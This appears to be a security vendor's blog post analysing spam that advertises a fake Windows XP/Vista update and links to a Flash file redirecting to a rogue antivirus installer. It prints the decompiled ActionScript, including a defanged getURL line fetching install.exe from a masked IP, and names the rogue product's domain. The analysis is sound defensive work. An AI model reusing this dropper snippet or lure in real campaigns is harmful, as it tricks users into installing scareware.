Latest Antivirus Updates

By: in 15107

We’re seeing a lot of spam right now using the now annoyingly familiar Free Update Windows XP,Vista spam template. This time though, instead of linking to an .EXE file, it is now pointing to an .SWF file.

Figure 1. Seen before: Spam announcing a free update for Windows XP and Vista

The SWF file linked via the large-font text Free Update Windows XP,Vista contains Flash ActionScript. One of the SWFs captured decompiles to the following (http changed to hxxp where it occurs below):

movie '82029540ui0.swf' {
// flash 6, total frames: 3, frame rate: 50 fps, 978x580 px, compressed

  // unknown tag 777 length 3

  movieClip 5 TextBox {
  }

  frame 2 {
    getURL('hxxp://89.xx.49.18/install.exe', '_self');
  }

  frame 3 {
    stop();
  }
}

This is what it looks like when opened in a browser.

Figure 2. Seen just now: SWF files instead of the typical EXE.

Running the install.exe will make the desktop look like this.

Figure 3. Seen before: “WARNING! Spyware detected!”

After this a EULA window appears, and then the system proceeds to install a rogue AV software from avxp-2008.net. Note that it does this automatically from the moment the install.exe is run:

Figure 4. Yet another rogue AV product hosted on a fresh domain (this one created August 20).

The technique used in the spam has two things going for it: 1. the use of SWF instead of EXE and 2. the use of an ImageShack-hosted file, both of which may suggest to normal users that the file is possibly harmless. So it seems the siege of rogue AV is not only not dying down, its proponents are becoming more creative in their “advertising” schemes.

We detect this rogue AV as TROJ_FAKEAV.IG.

Trackback This Post | Subscribe to the comments through RSS Feed